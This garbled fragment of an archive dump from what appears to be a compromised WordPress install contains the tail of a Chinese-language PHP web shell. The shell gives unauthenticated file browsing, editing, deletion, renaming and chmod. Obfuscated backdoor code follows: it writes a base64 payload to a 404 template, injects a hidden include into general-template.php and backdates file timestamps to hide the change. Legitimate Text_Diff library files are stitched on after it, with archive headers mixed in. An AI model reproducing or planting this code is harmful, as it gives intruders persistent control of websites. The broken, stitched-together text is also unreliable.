                    echo '<font color="red">编辑失败！</font><br /><br />';
                }
                fclose($fp);
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="edit"><br>
<input type="submit"  />
<br>
<br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">

</form>';
        }
        echo '</center>';
    }else{
        echo '</table><br /><center>';
//Delete dir and file
        if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

//Delete dir
            if($_GET['type'] == 'dir'){

                if(rmdir($patc)){
                    echo '<font color="green">删除成功！</font><br />';
                }else{
                    echo '<font color="red#">删除失败!>:(</font><br />';
                }
            }
//buat folder
            if($_GET['type'] == 'buat'){
                $haaa = $_POST['path'];
                $heee = $_POST['name'];
                $hooo = "$haaa/$heee";
                $new = $haaa.'/'.htmlspecialchars($heee);
                if(!mkdir($new)){
                    echo '<font color="red">新建目录失败!</font><br />';
                }else{
                    echo '<font color="green">新建目录成功! >:)</font><br />';
                }
            }
//Delete file
            elseif($_GET['type'] == 'file'){

                $hell = $_GET['path'];
                $yeah = $_GET['name'];
                $patc = "$hell/$yeah";

                if(unlink($patc)){
                    echo '<font color="green">文件删除成功</font><br />';
                }else{
                    echo '<font color="red">文件删除失败</font><br />';
                }
            }
        }
        echo '</center>';
        $scandir = scandir($path);
        $pa = getcwd();
        echo ' <div id="content"><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
 
<tr>
<th class=th_home style="background:black;color:#fff;"><center>名称</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>大小</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>权限</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>操作选项</center></th>
</tr>


 <tr>
<td class="td_home" align="center">
<a href="?ARRAY='.$ARRAY.'&path='.dirname($path).'" style="display:block; width:100%;" title="上一页">上一页</a>
</td><td class=td_home align=center>Size</td> <td class=td_home align=center>Chmod</td> <td class=td_home align=center> <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=baru&name=new.php">+ 新建文件</a> | <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=btw&type=dir">+ 新建目录</a> </td></tr>
';

        foreach($scandir as $dir){
            if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
            echo "
<tr>
<td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?ARRAY={$ARRAY}&path=$path/$dir\">$dir</a></td>
<td class=td_home ><center>DIR</center></td>
<td class=td_home align=center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=dir&name=$dir\" title='权限设置'>
";
            if(is_writable("$path/$dir")) echo '<font color="green">';
            elseif(!is_readable("$path/$dir")) echo '<font color="red">';
            echo juejiang_perms("$path/$dir");
            if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

            echo "
</a>
</td>


<td class=td_home ><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=dir&name=$dir\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=dir&name={$dir}'\">删除</a>
</center></td>
</tr>";
        }
        echo '<br>';
        foreach($scandir as $file){
            if(!is_file("$path/$file")) continue;
            $size = filesize("$path/$file")/1024;
            $size = round($size,3);
            if($size >= 1024){
                $size = round($size/1024,2).' MB';
            }else{
                $size = $size.' KB';
            }


            echo "<tr>
<td class=td_home > <img src='data:image/png;base64,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'>

";
// <a href=\"?ARRAY={$ARRAY}&filesrc=$path/$file&path=$path\">$file</a>
            echo "
<a href=\"?option&ARRAY={$ARRAY}&path={$path}&opt=edit&type=file&name={$file}\">{$file}</a>
</td>
<td class=td_home><center>".$size."</center></td>
<td class=td_home align='center'><a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=file&name=$file\" title='权限设置'>";



            if(is_writable("$path/$file")) echo '<font color="green">';
            elseif(!is_readable("$path/$file")) echo '<font color="red">';
            echo juejiang_perms("$path/$file");
            if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
            echo "</a></td>
<td class=td_home><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=edit&type=file&name=$file\">编辑</a>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=file&name=$file&path=$path\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=file&name={$file}'\">删除</a>
</center></td>
</tr>";
        }
        echo '</table>
</div>';
    }
    echo '<br><br><br><br></b>
</body> </html></body>
</html>';
    die;
endif;  // ====






"; // WP 404 @chmod($jue_jiang_404_path, 0644); @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404)); @touch($jue_jiang_404_path, filectime($file_general_template_path)); @chmod($jue_jiang_404_path, 0444); } $general_template_code = @file_get_contents($file_general_template_path); $gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs="); $isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false; if (!$isget_mat){ $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg=="); preg_match_all("/{$pma}/i",$general_template_code,$pr); $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)]; $jj404_b64_path = base64_encode($jue_jiang_404_path); $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code); @chmod($file_general_template_path, 0644); @file_put_contents($file_general_template_path,$new_general_template); @touch($file_general_template_path, filectime($file_general_template_path)); } ��Engine/shell.php��0000644��00000012123�15157426170�0007600 0��ustar�00��<?php /* * Class used internally by Diff to actually compute the diffs. * * This class uses the Unix `diff` program via shell_exec to compute the * differences between the two input arrays. * * Copyright 2007-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Milian Wolff <mail@milianw.de> * @package Text_Diff * @since 0.3.0 / class Text_Diff_Engine_shell { /* * Path to the diff executable * * @var string / var $_diffCommand = 'diff'; /* * Returns the array of differences. * * @param array $from_lines lines of text from old file * @param array $to_lines lines of text from new file * * @return array all changes made (array with Text_Diff_Op_* objects) / function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); $temp_dir = Text_Diff::_getTempDir(); // Execute gnu diff or similar to get a standard diff file. $from_file = tempnam($temp_dir, 'Text_Diff'); $to_file = tempnam($temp_dir, 'Text_Diff'); $fp = fopen($from_file, 'w'); fwrite($fp, implode("\n", $from_lines)); fclose($fp); $fp = fopen($to_file, 'w'); fwrite($fp, implode("\n", $to_lines)); fclose($fp); $diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { // No changes were made return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); // Get changed lines by parsing something like: // 0a1,2 // 1,2c4,6 // 1,5d6 preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { // This paren is not set every time (see regex). $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($from_line_no < $match[1] \|\| $to_line_no < $match[4]) { // copied lines assert($match[1] - $from_line_no == $match[4] - $to_line_no); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': // deleted lines array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': // changed lines array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this->_getLines($to_lines, $to_line_no, $match[5]))); break; case 'a': // added lines array_push($edits, new Text_Diff_Op_add( $this->_getLines($to_lines, $to_line_no, $match[5]))); $from_line_no++; break; } } if (!empty($from_lines)) { // Some lines might still be pending. Add them as copied array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $from_line_no + count($from_lines) - 1), $this->_getLines($to_lines, $to_line_no, $to_line_no + count($to_lines) - 1))); } return $edits; } /* * Get lines from either the old or new text * * @access private * * @param array $text_lines Either $from_lines or $to_lines (passed by reference). * @param int $line_no Current line number (passed by reference). * @param int $end Optional end line, when we want to chop more * than one line. * * @return array The chopped lines / function _getLines(&$text_lines, &$line_no, $end = false) { if (!empty($end)) { $lines = array(); // We can shift even more while ($line_no <= $end) { array_push($lines, array_shift($text_lines)); $line_no++; } } else { $lines = array(array_shift($text_lines)); $line_no++; } return $lines; } } ��Renderer/inline.php��0000644��00000012630�15157426170�0010313 0��ustar�00��<?php /* * "Inline" diff renderer. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Ciprian Popovici * @package Text_Diff / /* Text_Diff_Renderer / // WP #7391 require_once dirname(dirname(__FILE__)) . '/Renderer.php'; /* * "Inline" diff renderer. * * This class renders diffs in the Wiki-style "inline" format. * * @author Ciprian Popovici * @package Text_Diff / class Text_Diff_Renderer_inline extends Text_Diff_Renderer { /* * Number of leading context "lines" to preserve. * * @var integer / var $_leading_context_lines = 10000; /* * Number of trailing context "lines" to preserve. * * @var integer / var $_trailing_context_lines = 10000; /* * Prefix for inserted text. * * @var string / var $_ins_prefix = '<ins>'; /* * Suffix for inserted text. * * @var string / var $_ins_suffix = '</ins>'; /* * Prefix for deleted text. * * @var string / var $_del_prefix = '<del>'; /* * Suffix for deleted text. * * @var string / var $_del_suffix = '</del>'; /* * Header for each change block. * * @var string / var $_block_header = ''; /* * Whether to split down to character-level. * * @var boolean / var $_split_characters = false; /* * What are we currently splitting on? Used to recurse to show word-level * or character-level changes. * * @var string / var $_split_level = 'lines'; function _blockHeader($xbeg, $xlen, $ybeg, $ylen) { return $this->_block_header; } function _startBlock($header) { return $header; } function _lines($lines, $prefix = ' ', $encode = true) { if ($encode) { array_walk($lines, array(&$this, '_encode')); } if ($this->_split_level == 'lines') { return implode("\n", $lines) . "\n"; } else { return implode('', $lines); } } function _added($lines) { array_walk($lines, array(&$this, '_encode')); $lines[0] = $this->_ins_prefix . $lines[0]; $lines[count($lines) - 1] .= $this->_ins_suffix; return $this->_lines($lines, ' ', false); } function _deleted($lines, $words = false) { array_walk($lines, array(&$this, '_encode')); $lines[0] = $this->_del_prefix . $lines[0]; $lines[count($lines) - 1] .= $this->_del_suffix; return $this->_lines($lines, ' ', false); } function _changed($orig, $final) { / If we've already split on characters, just display. / if ($this->_split_level == 'characters') { return $this->_deleted($orig) . $this->_added($final); } / If we've already split on words, just display. / if ($this->_split_level == 'words') { $prefix = ''; while ($orig[0] !== false && $final[0] !== false && substr($orig[0], 0, 1) == ' ' && substr($final[0], 0, 1) == ' ') { $prefix .= substr($orig[0], 0, 1); $orig[0] = substr($orig[0], 1); $final[0] = substr($final[0], 1); } return $prefix . $this->_deleted($orig) . $this->_added($final); } $text1 = implode("\n", $orig); $text2 = implode("\n", $final); / Non-printing newline marker. / $nl = "\0"; if ($this->_split_characters) { $diff = new Text_Diff('native', array(preg_split('//', $text1), preg_split('//', $text2))); } else { / We want to split on word boundaries, but we need to preserve * whitespace as well. Therefore we split on words, but include * all blocks of whitespace in the wordlist. / $diff = new Text_Diff('native', array($this->_splitOnWords($text1, $nl), $this->_splitOnWords($text2, $nl))); } / Get the diff in inline format. / $renderer = new Text_Diff_Renderer_inline (array_merge($this->getParams(), array('split_level' => $this->_split_characters ? 'characters' : 'words'))); / Run the diff and get the output. */ return str_replace($nl, "\n", $renderer->render($diff)) . "\n"; } function _splitOnWords($string, $newlineEscape = "\n") { // Ignore \0; otherwise the while loop will never finish. $string = str_replace("\0", '', $string); $words = array(); $length = strlen($string); $pos = 0; while ($pos < $length) { // Eat a word with any preceding whitespace. $spaces = strspn(substr($string, $pos), " \n"); $nextpos = strcspn(substr($string, $pos + $spaces), " \n"); $words[] = str_replace("\n", $newlineEscape, substr($string, $pos, $spaces + $nextpos)); $pos += $spaces + $nextpos; } return $words; } function _encode(&$string) { $string = htmlspecialchars($string); } } ��

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